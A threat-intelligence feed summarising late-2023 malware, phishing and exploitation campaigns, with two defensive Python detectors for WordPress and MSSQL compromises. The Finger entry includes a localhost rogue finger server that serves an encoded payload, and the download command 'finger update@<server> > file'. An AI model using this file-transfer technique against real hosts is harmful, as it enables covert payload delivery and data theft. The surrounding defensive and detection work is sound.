Source: https://www.cisa.gov/news-events/alerts/2023/12/07/cisa-and-international-partners-release-advisory-russia-based-threat-actor-group-star-blizzard https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/
2023-12-07
A_huge_spike_scale_phishing_campaign
LOW
+
Intel Source:
Patchstack
Intel Name:
A_huge_spike_scale_phishing_campaign
Date of Scan:
2023-12-07
Impact:
LOW
Summary:
The Patchstack team has been keeping an eye on a large-scale phishing campaign with different variants of phishing emails going around that notify users about a new security vulnerability in their WordPress website, supposedly a “Remote Code Execution (RCE)” vulnerability “CVE-2023-45124”, and ask them to patch right away using a “Patch created by the WordPress Team”. The email is fake, and the plugin that users are asked to download and install is malicious and can infect the website with a backdoor and a malicious administrator account.
Source: https://patchstack.com/articles/fake-cve-phishing-campaign-tricks-wordpress-users-to-install-malware/
2023-12-07
Detailed_analysis_of_PlugX_Malware
LOW
+
Intel Source:
Splunk
Intel Name:
Detailed_analysis_of_PlugX_Malware
Date of Scan:
2023-12-07
Impact:
LOW
Summary:
The Splunk researchers team shared their deep analysis on a PlugX variant, uncovering all sides of malicious payload, tactics, and impact on the digital realm, including: PlugX .DAT Payload Extraction, PlugX .CFG Decryption, PlugX Extractor Tool, PlugX Analysis.
Source: https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html
2023-12-06
New_Trojan_BlueNoroff_loader_attacking_macOS_users
LOW
+
Intel Source:
Securelist
Intel Name:
New_Trojan_BlueNoroff_loader_attacking_macOS_users
Date of Scan:
2023-12-06
Impact:
LOW
Summary:
Securelist uncovered a new variety of malicious loader that attacks macOS, suspected to belong to the BlueNoroff APT gang and its known RustBucket campaign. The threat actor is known to attack financial organizations whose activity is related to cryptocurrency, as well as individuals who hold crypto assets or take an interest in the subject.
Source: https://securelist.com/bluenoroff-new-macos-malware/111290/
2023-12-06
New_macOS_Trojan_Proxy_piggybacking_on_cracked_software
LOW
+
Intel Source:
Securelist
Intel Name:
New_macOS_Trojan_Proxy_piggybacking_on_cracked_software
Date of Scan:
2023-12-06
Impact:
LOW
Summary:
Securelist researchers identified several cracked applications distributed by illegal websites and loaded with a Trojan-Proxy. Attackers use this malware to make money by building a proxy server network or to perform illegal activities on behalf of the victim: to launch attacks on websites, companies, and individuals, and to buy guns, drugs, and other illicit goods.
Source: https://securelist.com/trojan-proxy-for-macos/111325/
2023-12-06
WSF_Script_Variant_of_AsyncRAT_Malware_Campaign
MEDIUM
+
Intel Source:
ASEC
Intel Name:
WSF_Script_Variant_of_AsyncRAT_Malware_Campaign
Date of Scan:
2023-12-06
Impact:
MEDIUM
Summary:
A recent analysis by the AhnLab Security Emergency Response Center (ASEC) reveals a shift in the distribution method of the AsyncRAT malware. Previously distributed through files with the .chm extension, the malware is now using WSF script format, found in compressed (.zip) files distributed via email URLs. The WSF script, when executed, triggers a sequence of events, downloading and running Visual Basic scripts that ultimately execute the AsyncRAT malware. The campaign employs fileless attack techniques, bypassing UAC and utilizing various scripts to maintain persistence, collect system information, and exfiltrate data.
Source: https://asec.ahnlab.com/en/59573/
2023-12-06
Unidentified_Infostealer_Dec5
LOW
+
Intel Source:
Unit42
Intel Name:
Unidentified_Infostealer_Dec5
Date of Scan:
2023-12-06
Impact:
LOW
Summary:
Loader EXE leads to unidentified malware with C2 using encoded/encrypted TCP traffic on 91.92.120[.]119.
Source: https://twitter.com/Unit42_Intel/status/1732411660013273387 https://www.linkedin.com/posts/unit42_malwaretraffic-timelythreatintel-unit42threatintel-activity-7138177279964151809--S66/
2023-12-05
Multi_Layered_Invoice_Campaign_Unveils_Stealthy_LUMMA_InfoStealer_Attack
MEDIUM
+
Intel Source:
Perception Point
Intel Name:
Multi_Layered_Invoice_Campaign_Unveils_Stealthy_LUMMA_InfoStealer_Attack
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Researchers at Perception Point recently uncovered a sophisticated malware attack leveraging a multi-layered fake invoice campaign. The threat actor, impersonating a financial services company, prompts users to click on a seemingly legitimate invoice link, creating an evasion tactic. The attacker exploits a breached website to redirect users, initiating the download of a JavaScript file containing the LUMMA InfoStealer malware. LUMMA, distributed through Malware-as-a-Service, executes complex processes from unusual locations, adding layers of obfuscation to the attack.
Source: https://perception-point.io/blog/behind-the-attack-lumma-malware/
2023-12-05
Vast_Parcel_Delivery_Phishing_Campaign
LOW
+
Intel Source:
Bolster
Intel Name:
Vast_Parcel_Delivery_Phishing_Campaign
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
Bolster’s researchers have discovered new scam tactics: a domain impersonating Walmart, precisely designed to mimic the appearance of the USPS.com website.
Source: https://bolster.ai/blog/usps-phishing-campaign
2023-12-05
Exploitation_of_Adobe_ColdFusion_or_Initial_Access_to_Government_Servers
HIGH
+
Intel Source:
CISA
Intel Name:
Exploitation_of_Adobe_ColdFusion_or_Initial_Access_to_Government_Servers
Date of Scan:
2023-12-05
Impact:
HIGH
Summary:
CISA has released a Cybersecurity Advisory confirming the exploitation of CVE-2023-26360 by unknown threat actors at a Federal Civilian Executive Branch (FCEB) agency. The vulnerability is an improper access control issue affecting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). Exploitation can result in arbitrary code execution.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a
2023-12-05
Global_credit_card_information_campaigns_targeting_users_in_different_services
LOW
+
Intel Source:
CuratedIntel
Intel Name:
Global_credit_card_information_campaigns_targeting_users_in_different_services
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
Tas and Curated Intel researchers shared their discovery of a newly observed phishing method that uses the chat functionality of multiple web and mobile applications. The campaign introduced a novel TTP: abusing the chat features of postal, reservation, and e-commerce services.
Source: https://www.curatedintel.org/2023/12/curated-intel-threat-report-multi.html
2023-12-05
TA422_s_Dedicated_Exploitation
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
TA422_s_Dedicated_Exploitation
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Since the middle of the year 2023, Proofpoint researchers have observed regular TA422 (APT28) phishing activity, where the threat actor leveraged patched vulnerabilities including CVE-2023-23397 to send, at times, high-volume campaigns to targets in Europe and North America. TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta422s-dedicated-exploitation-loop-same-week-after-week
2023-12-05
DanaBot_Stealer
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
DanaBot_Stealer
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Cyfirma analysts provided a comprehensive analysis of the DanaBot information stealer, with a thorough examination of its functionality and capabilities. DanaBot is a stealthy and versatile malware that infiltrates computers to steal valuable information for monetization. Unlike ransomware, which demands immediate payment, DanaBot operates discreetly, prioritizing long-term persistence and the theft of sensitive data.
Source: https://www.cyfirma.com/outofband/danabot-stealer-a-multistage-maas-malware-re-emerges-with-reduced-detectability/
2023-12-05
New_Cyber_Espionage_Threat_Targets_US_Aerospace_Industry
LOW
+
Intel Source:
Blackberry
Intel Name:
New_Cyber_Espionage_Threat_Targets_US_Aerospace_Industry
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
BlackBerry's Threat Research team has uncovered a sophisticated cyber-espionage campaign, naming the threat actor AeroBlade, targeting a U.S. aerospace organization. Initiated through spear-phishing, the attacker evolved their tactics from a testing phase in September 2022 to a more advanced stage in July 2023. The attacker's goal, assessed with medium to high confidence, is commercial cyber espionage.
Source: https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry
2023-12-05
Exploit_of_PLCs_in_US_Water_and_Wastewater_Systems_Facilities
HIGH
+
Intel Source:
CISA
Intel Name:
Exploit_of_PLCs_in_US_Water_and_Wastewater_Systems_Facilities
Date of Scan:
2023-12-05
Impact:
HIGH
Summary:
The FBI, CISA, NSA, EPA, and the Israel National Cyber Directorate released a joint Security Advisory on continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat cyber actors. The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona "CyberAv3ngers" are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs).
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a
2023-12-05
Lumma_Stealer_threat_in_the_expanding_infostealers_Ecosystem
MEDIUM
+
Intel Source:
Cyberint
Intel Name:
Lumma_Stealer_threat_in_the_expanding_infostealers_Ecosystem
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Lumma Stealer, identified in August 2022, continues to evolve as a prominent InfoStealer. Orchestrated by threat actor "Shamel," it targets crypto users, extracting sensitive data through various methods. Priced at $140-$160 per month on the dark web, Lumma Stealer poses a significant risk with potential financial losses, compromised security, and privacy breaches. Its impact extends to organizational reputational damage. Businesses are urged to stay vigilant and implement robust cybersecurity measures against this evolving threat.
Source: https://cyberint.com/blog/research/the-lumma-stealer-infostealer-the-details/
2023-12-05
P2PInfect
LOW
+
Intel Source:
CADO Security
Intel Name:
P2PInfect
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
Cado analysts have been monitoring the development of a cross-platform botnet “P2Pinfect”. As the name suggests, the malware – written in Rust – acts as a botnet agent, connecting infected hosts in a peer-to-peer topology.
Source: https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/
2023-12-05
Compromise_of_SEO_Poisoning_and_Large_Payloads_by_GootLoader_threat
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Compromise_of_SEO_Poisoning_and_Large_Payloads_by_GootLoader_threat
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
The Cybereason IR team documented several attack scenarios that began with a GootLoader infection and went on to deploy additional capabilities. The team observed large payloads (40 MB and more) masquerading as legitimate JavaScript code to evade security controls, fast-moving post-infection behavior, and the deployment of the post-exploitation frameworks Cobalt Strike and SystemBC (the latter usually leveraged for data exfiltration), with SEO poisoning used to spread the malware.
Source: https://www.cybereason.com/blog/threat-alert-gootloader-seo-poisoning-and-large-payloads-leading-to-compromise
2023-12-05
DJvu_Variant_Xaro_Delivered_via_Freeware_Loader
LOW
+
Intel Source:
Cybereason
Intel Name:
DJvu_Variant_Xaro_Delivered_via_Freeware_Loader
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
The Cybereason Security Services Team is investigating incidents involving a variant of the DJvu ransomware named "Xaro," delivered through loaders masquerading as freeware. This attack aims at data exfiltration, information theft, and file encryption for ransom. Notable observations include the .xaro extension appended to affected files and a "shotgun" infection approach, deploying various malware strains alongside Xaro.
Source: https://www.cybereason.com/blog/threat-alert-djvu-variant-delivered-by-loader-masquerading-as-freeware
2023-12-05
Return_of_the_Banking_Trojan_TrickMo
LOW
+
Intel Source:
Cyble
Intel Name:
Return_of_the_Banking_Trojan_TrickMo
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
Cyble researchers discovered a new variant of the TrickMo banking trojan via VirusTotal Intelligence in September 2023. Compared with the previous analysis, this variant demonstrates advanced functionality, employing overlay injection to extract credentials from targeted applications instead of relying on screen recording, as the first iteration did.
Source: https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/
2023-12-05
Unveiling_Akira_Ransomware
MEDIUM
+
Intel Source:
Trellix
Intel Name:
Unveiling_Akira_Ransomware
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Discovered in 2023, the Akira ransomware employs a double extortion scheme, targeting diverse sectors with victims primarily in the United States. Using various initial access methods, including multi-factor authentication exploitation and spear phishing, the ransomware exfiltrates data, encrypts files with ChaCha, and demands payment for decryption and data protection.
Source: https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
2023-12-05
Ransomware_group_Trigona_operation
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Ransomware_group_Trigona_operation
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
Trigona threat actors were observed leveraging the vulnerability CVE-2021-40539. Trigona also obtains access to compromised accounts from network access brokers. Based on a combination of Trend's open-source intelligence (OSINT) research and investigation of the leak site, Trigona ransomware compromised 33 organizations within a short period, primarily in North America and Europe; enterprises in Asia-Pacific, Latin America, and the Caribbean were also compromised.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-trigona
2023-12-05
Threat_Actors_Target_MSSQL_Servers
MEDIUM
+
Intel Source:
STR
Intel Name:
Threat_Actors_Target_MSSQL_Servers
Date of Scan:
2023-12-05
Impact:
MEDIUM
Summary:
In an interesting attack campaign, the Securonix Threat Research team has identified threat actors targeting exposed Microsoft SQL (MSSQL) services using brute force attacks. One of the things that makes DB#JAMMER stand out is how the attacker’s tooling infrastructure and payloads are used. The ransomware payload of choice appears to be a newer variant of Mimic ransomware called FreeWorld.
Source: https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/
2023-12-05
WordPress_Phishing_Campaign_Targets_Users_with_Fake_Security_Patch_Plugin
LOW
+
Intel Source:
Wordfence
Intel Name:
WordPress_Phishing_Campaign_Targets_Users_with_Fake_Security_Patch_Plugin
Date of Scan:
2023-12-05
Impact:
LOW
Summary:
Wordfence Threat Intelligence Team has identified a phishing campaign targeting WordPress users, falsely warning of a non-existent Remote Code Execution vulnerability (CVE-2023-45124). The phishing email instructs users to download a fake "Patch" plugin, leading to a malicious backdoor. The plugin adds an administrator user (wpsecuritypatch) and communicates with a command and control domain. The separate backdoor provides multiple forms of access, enabling full control over the WordPress site and the server's web user account.
Source: https://www.wordfence.com/blog/2023/12/psa-fake-cve-2023-45124-phishing-scam-tricks-users-into-installing-backdoor-plugin/
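The concrete indicator in this entry is the rogue administrator `wpsecuritypatch` that the fake "Patch" plugin creates. The following is an added example, not Wordfence's tooling: it feeds the JSON output of two real WP-CLI commands (`wp user list --role=administrator --fields=ID,user_login,user_email,user_registered --format=json` and `wp plugin list --fields=name,status --format=json`) into a checker that compares administrators and plugin slugs against an operator-maintained baseline. The sample JSON, the baseline sets, and the plugin slug `wordpress-security-patch` are constructed for the example; only the login `wpsecuritypatch` comes from the post.

```python
import json
from datetime import datetime, timedelta

# Constructed output of:
#   wp user list --role=administrator --fields=ID,user_login,user_email,user_registered --format=json
# The users are placeholders, except the login the Wordfence post names.
SAMPLE_ADMINS_JSON = json.dumps([
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.com",
     "user_registered": "2021-03-02 10:15:00"},
    {"ID": 57, "user_login": "wpsecuritypatch", "user_email": "",
     "user_registered": "2023-12-04 22:41:13"},
])

# Constructed output of: wp plugin list --fields=name,status --format=json
# "wordpress-security-patch" is a hypothetical slug standing in for the fake plugin.
SAMPLE_PLUGINS_JSON = json.dumps([
    {"name": "akismet", "status": "active"},
    {"name": "wordpress-security-patch", "status": "active"},
])

# Baselines an operator keeps for this site (assumed for the example).
EXPECTED_ADMINS = {"siteowner"}
EXPECTED_PLUGINS = {"akismet"}
# Administrator login the fake "Patch" plugin creates, per the Wordfence post.
KNOWN_BAD_ADMINS = {"wpsecuritypatch"}


def audit_admins(admins_json, expected, now, recent=timedelta(days=7)):
    """Return one finding per administrator that deviates from the baseline.

    Each finding carries every reason that fired, so an analyst sees at a glance
    whether it is merely a new admin or the known backdoor account."""
    findings = []
    for user in json.loads(admins_json):
        login = user["user_login"]
        registered = datetime.strptime(user["user_registered"], "%Y-%m-%d %H:%M:%S")
        reasons = []
        if login in KNOWN_BAD_ADMINS:
            reasons.append("known backdoor account name")
        if login not in expected:
            reasons.append("administrator not in baseline")
        if now - registered <= recent:
            reasons.append("created in the last %d days" % recent.days)
        if not user.get("user_email"):
            reasons.append("no e-mail address")
        if reasons:
            findings.append({"user": login, "id": user["ID"], "reasons": reasons})
    return findings


def audit_plugins(plugins_json, expected):
    """Plugin slugs present on the site but absent from the baseline."""
    return sorted(p["name"] for p in json.loads(plugins_json) if p["name"] not in expected)


def run_audit(now=datetime(2023, 12, 5, 9, 0, 0)):
    """Run both checks over the constructed samples; 'now' is fixed for repeatability."""
    return (audit_admins(SAMPLE_ADMINS_JSON, EXPECTED_ADMINS, now),
            audit_plugins(SAMPLE_PLUGINS_JSON, EXPECTED_PLUGINS))


if __name__ == "__main__":
    admins, plugins = run_audit()
    for f in admins:
        print("ADMIN %s (ID %d): %s" % (f["user"], f["id"], "; ".join(f["reasons"])))
    for slug in plugins:
        print("PLUGIN not in baseline: %s" % slug)
```

On a live site replace the two sample strings with the real WP-CLI output. A clean listing is necessary but not sufficient: the entry notes a separate backdoor that grants access independently of the plugin, so compare the plugin directory on disk and the web user's writable paths as well.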
2023-12-04
BlueSky_Ransomware_Emerges
LOW
+
Intel Source:
thedfirreport
Intel Name:
BlueSky_Ransomware_Emerges
Date of Scan:
2023-12-04
Impact:
LOW
Summary:
In December, a notable intrusion occurred, targeting public-facing MSSQL servers, resulting in the deployment of BlueSky ransomware. This report unveils the threat actors' techniques, starting with a MSSQL brute force attack on the "sa" account. Leveraging Cobalt Strike and Tor2Mine, the attackers executed post-exploitation activities. Within an hour, BlueSky ransomware spread network-wide. The report provides a comprehensive breakdown, including threat actor profiles, initial access details, execution events, persistence methods, privilege escalation tactics, and the impact of the ransomware.
Source: https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
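Both this BlueSky intrusion and the DB#JAMMER entry above (Securonix) begin with password brute force against an internet-exposed MSSQL service, here against the `sa` account. The following is an added example, not code from either report: it parses SQL Server ERRORLOG login messages from a constructed excerpt and raises an alert when one client accumulates failures against one login inside a sliding window, plus a higher-severity alert when a success from the same client follows that burst. The log lines, client addresses and thresholds are constructed; note that successful logins only appear in ERRORLOG when the instance's login auditing is set to record both failed and successful logins.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (not taken from either report): a burst
# of failed 'sa' logins from one client, a success from the same client, and one
# unrelated failure. Addresses are documentation ranges.
SAMPLE_ERRORLOG = """\
2023-12-04 03:12:44.13 Logon       Error: 18456, Severity: 14, State: 8.
2023-12-04 03:12:44.13 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:44.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:44.71 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:45.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:45.33 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:45.64 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2023-12-04 03:12:46.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.10]
2023-12-04 03:15:00.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

# Matches the "Login failed/succeeded for user '...'" messages; the separate
# "Error: 18456" lines carry no client and are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*?"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text):
    """Turn ERRORLOG text into a list of {ts, ok, user, client} dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "ok": m["result"] == "succeeded",
            "user": m["user"],
            "client": m["client"],
        })
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding-window failure count per (client, user).

    Emits ('bruteforce', ...) once when a key reaches `threshold` failures inside
    `window`, and ('bruteforce_success', ...) when a successful login arrives
    while that many failures are still inside the window: the signal that the
    password guessing worked."""
    failures = defaultdict(deque)   # (client, user) -> timestamps of recent failures
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["client"], ev["user"])
        q = failures[key]
        while q and ev["ts"] - q[0] > window:   # expire old failures
            q.popleft()
        if ev["ok"]:
            if len(q) >= threshold:
                alerts.append(("bruteforce_success", ev["client"], ev["user"], ev["ts"]))
            q.clear()
            continue
        q.append(ev["ts"])
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append(("bruteforce", ev["client"], ev["user"], ev["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, client, user, ts in detect_bruteforce(parse_logon_events(SAMPLE_ERRORLOG)):
        print(f"{ts} {kind:19} client={client} user={user}")
```

The same logic applies to Windows Security event 18456 records collected by a SIEM; only the parser changes. Tune `threshold` and `window` to the instance: a legitimate application with a rotated password can produce a short burst of failures from one host, but it will not be followed by a success against `sa` from an external address.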
2023-12-01
Uncovering_the_new_Java_Based_SAW_RAT
LOW
+
Intel Source:
Cyble
Intel Name:
Uncovering_the_new_Java_Based_SAW_RAT
Date of Scan:
2023-12-01
Impact:
LOW
Summary:
This article provides an analysis of the Saw RAT, a Java-based RAT embedded in a ZIP archive file. It outlines the infiltration strategy, which involves a maliciously crafted ZIP archive containing a PDF icon shortcut, a JavaScript file, a deceptive PDF file, and a malicious JAR file. The malware establishes a connection with a C&C server and carries out various functions in response to commands. Recommendations for best practices to protect against such attacks are also provided.
Source: https://cyble.com/blog/uncovering-the-new-java-based-saw-rats-infiltration-strategy-via-lnk-files/
2023-12-01
Fake_Virus_Alerts
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Fake_Virus_Alerts
Date of Scan:
2023-12-01
Impact:
LOW
Summary:
ScamClub has been running a malvertising campaign since 2018, redirecting mobile users on high profile websites to a fake security alert connected to a malicious McAfee affiliate. The malicious JavaScripts were hosted on Google's cloud but have since moved to Azure's CDN. Malwarebytes for Android can protect users from this campaign. Indicators of compromise are provided.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts
2023-12-01
Attacks_against_organizations_in_the_Middle_East_and_Africa
LOW
+
Intel Source:
PaloAlto
Intel Name:
Attacks_against_organizations_in_the_Middle_East_and_Africa
Date of Scan:
2023-12-01
Impact:
LOW
Summary:
Unit 42 researchers identified a tool set used by a threat actor against organizations in the Middle East, Africa and the US, including the Agent Raccoon malware, Ntospy, and a customized version of Mimikatz. The tool set was used to exfiltrate confidential information, such as emails and Roaming Profiles, and was mapped to the MITRE ATT&CK matrix.
Source: https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
2023-12-01
Cactus_Ransomware_Campaign_Exploiting_Vulnerabilities_in_Qlik_Sense
MEDIUM
+
Intel Source:
Arctic Wolf
Intel Name:
Cactus_Ransomware_Campaign_Exploiting_Vulnerabilities_in_Qlik_Sense
Date of Scan:
2023-12-01
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf Labs have observed a new Cactus ransomware campaign exploiting publicly exposed installations of Qlik Sense. This is the first documented instance Arctic Wolf is aware of in which threat actors deploying Cactus ransomware have exploited vulnerabilities in Qlik Sense for initial access.
Source: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/
2023-12-01
Early_Detection_of_ROMCOM_malicious_DNS
LOW
+
Intel Source:
Infoblox
Intel Name:
Early_Detection_of_ROMCOM_malicious_DNS
Date of Scan:
2023-12-01
Impact:
LOW
Summary:
This article discusses the ROMCOM malware and the threat actor group Void Rabisu, and how Infoblox's DNS Early Detection Program flagged multiple ROMCOM domains as suspicious an average of 91.6 days before they were identified as malicious in OSINT. It also explains how ROMCOMLITE, a new variant of the malware, is being used to target organizations in Ukraine and various NATO countries, and how Infoblox's suspicious-domain data can help customers reduce risk and increase the return on investment of their threat intelligence program.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-romcom/
2023-12-01
South_Korea_and_Uzbekistan_are_Targeted_by_SugarGh0st_RAT
LOW
+
Intel Source:
Cisco Talos
Intel Name:
South_Korea_and_Uzbekistan_are_Targeted_by_SugarGh0st_RAT
Date of Scan:
2023-12-01
Impact:
LOW
Summary:
Cisco Talos researchers have identified a new RAT, "SugarGh0st," in a malicious campaign. They assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2. They observed two infection chains leveraging Windows Shortcut embedded with malicious JavaScript to deliver the components to drop and launch the SugarGh0st payload.
Source: https://blog.talosintelligence.com/new-sugargh0st-rat/
2023-11-30
Malware_Distributing_Using_Sale_of_Personal_Information_as_Bait
LOW
+
Intel Source:
ASEC
Intel Name:
Malware_Distributing_Using_Sale_of_Personal_Information_as_Bait
Date of Scan:
2023-11-30
Impact:
LOW
Summary:
Researchers from ASEC have uncovered a malware distribution case that uses the sale of personal information as a lure, relying on social engineering.
Source: https://asec.ahnlab.com/en/59379/
2023-11-30
South_Korean_Research_Institutes_Targeted_by_Kimsuky
LOW
+
Intel Source:
ASEC
Intel Name:
South_Korean_Research_Institutes_Targeted_by_Kimsuky
Date of Scan:
2023-11-30
Impact:
LOW
Summary:
ASEC researchers have discovered that the Kimsuky threat group is sending malicious JSE files disguised as an import declaration to South Korean research institutes. Ultimately, the threat actor employs a backdoor to execute commands and steal data.
Source: https://asec.ahnlab.com/en/59387/
2023-11-30
The_release_of_new_malware_Nova_infostealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
The_release_of_new_malware_Nova_infostealer
Date of Scan:
2023-11-30
Impact:
LOW
Summary:
MaaS operator Sordeal has developed the Nova infostealer, a sophisticated malware with alarming capabilities such as credential harvesting, Discord injection, and targeting crypto wallets. Organizations must enhance their threat detection and fortify defenses to mitigate the risks posed by Nova. Strategic, tactical, and management recommendations are provided to help protect against the malware.
Source: https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/
2023-11-30
Observed_the_use_of_Finger_a_client_server_application
LOW
+
Intel Source:
Huntress
Intel Name:
Observed_the_use_of_Finger_a_client_server_application
Date of Scan:
2023-11-30
Impact:
LOW
Summary:
Huntress analysts observed the use of Finger, a client-server application, to exfiltrate data from an endpoint. The threat actor created a webshell on an MSExchange server and used Finger to download a file and gain situational awareness. In September 2020, an advisory was published by security researcher John Page. MITRE ATT&CK mappings and a statistic from Huntress' SMB Threat Report are also provided.
Source: https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger
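Finger (RFC 1288) is a one-line query over TCP port 79 whose reply is free-form text, which is exactly why a built-in client can be turned into a file download: the "user" name selects the content and the reply is whatever the server chooses to send. The following is an added example, not Huntress's code: a rogue finger daemon on localhost that answers a chosen query with a payload, and the client side of the same exchange that `finger.exe user@host` performs on Windows. The query name, the payload blob and the port are constructed for the example.

```python
import socket
import threading

# Constructed "payload" the rogue finger server hands back for one query name:
# a base64 blob a follow-on command on the victim would decode. Not a real sample.
PAYLOAD_BY_USER = {
    "update": "cG93ZXJzaGVsbCAtbm9wIC1jIFdyaXRlLUhvc3QgJ2V4YW1wbGUn",
}


def handle_finger_client(conn):
    """Server side of RFC 1288: read one CRLF-terminated line, answer, close."""
    with conn:
        request = b""
        while not request.endswith(b"\r\n") and len(request) < 512:
            chunk = conn.recv(64)
            if not chunk:
                break
            request += chunk
        query = request.decode("ascii", "replace").strip()
        if query.startswith("/W"):          # verbose form: "/W user"
            query = query[2:].strip()
        body = PAYLOAD_BY_USER.get(query, "no such user")
        conn.sendall(body.encode("ascii") + b"\r\n")


def start_finger_server(host="127.0.0.1", port=0):
    """Bind a rogue finger daemon (ephemeral port by default); returns (sock, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                      # listening socket was shut down
            threading.Thread(target=handle_finger_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def stop_finger_server(srv):
    try:
        srv.shutdown(socket.SHUT_RDWR)      # unblocks accept() on Linux
    except OSError:
        pass
    srv.close()


def finger_query(user, host, port=79, timeout=5.0):
    """Client side: send "user\\r\\n", read until the server closes, return the text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(user.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", "replace").strip()


def demo():
    """Run the exchange end to end on localhost; returns (payload reply, miss reply)."""
    srv, port = start_finger_server()
    try:
        got = finger_query("update", "127.0.0.1", port)
        miss = finger_query("nobody", "127.0.0.1", port)
    finally:
        stop_finger_server(srv)
    return got, miss


if __name__ == "__main__":
    got, miss = demo()
    print("reply for 'update':", got)
    print("reply for 'nobody':", miss)
```

On the victim the attacker only needs the stock client and a redirect (`finger update@<server> > file`), which is why the practical indicators are process creation of `finger.exe` with a `user@host` argument and outbound connections to TCP/79, neither of which has a legitimate reason to exist on a modern Exchange server.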
2023-11-29
Delivering_DJvu_Variant_while_Posing_as_Freeware_via_Loader
MEDIUM
+
Intel Source:
cybereason
Intel Name:
Delivering_DJvu_Variant_while_Posing_as_Freeware_via_Loader
Date of Scan:
2023-11-29
Impact:
